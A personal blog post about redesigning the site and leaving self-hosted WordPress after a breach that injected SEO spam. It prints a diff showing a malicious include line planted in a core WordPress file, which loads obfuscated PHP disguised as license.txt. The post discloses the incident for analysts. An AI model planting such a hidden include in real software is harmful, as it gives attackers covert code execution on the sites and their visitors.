As you can see, this blog finally gets a new look based on the excellent WordPress Bootstrap theme from 320press (modelled after Twitter Bootstrap). Behind the scene, there is also another major change as I moved from self-hosted WordPress with Dreamhost to the managed WordPress service from Page.ly (Note: this is a referral link), the widely known high-performance and secured WordPress hosting. If you think my blog is now much faster than before, that’s hopefully one of the impacts.
The major reason behind this recent move is rather scary. My previous WordPress installation was breached and the content was modified for some dubious SEO campaign. It might be just an accident but apparently at around the same time 18 million hosted blogs at WordPress.com were also compromised. It could be the case of cross-contamination, something which is known to trigger the Blackhat SEO malware. Since I am not a security expert and I know almost nothing about WordPress, it was hard for me to find out what went wrong (I did the usual basic steps to harden WordPress as I did the installation). Perhaps my shell account was simply cracked.
During the back-up and the moving process to the new setup, the only forensic act I did was to check the WordPress installation itself. Compared to the fresh 3.3.1, there is this malicious injection:
@@ -1,4 +1,5 @@
-< ?php
+<?php
+@include_once $_SERVER['DOCUMENT_ROOT'].'/wp-includes/license.txt';
/**
* WordPress DB Class
*
That referred license.txt
is timestamped March 29, 2012 (if that can be trusted at all). As expected, the content of the file is not the actual license of WordPress but rather the obfuscated PHP code to carry out suspicious bootstrapping sequences as the initial attack. After formatting it, you can see the full content at gist.github.com/2338282. I know very little PHP and I don’t have the motivation to decipher the entire attack machinery, but I hope this can be useful for some security experts and/or malware analyzers out there.
In the last half a year, my blog gets an average of 12K visits/month, with the bandwidth consumption reaching up 15 GB/month. If there will be another incident like this in the near future, perhaps I should just give up dynamic content management and write or generate plain document instead. In the mean time, keep reading!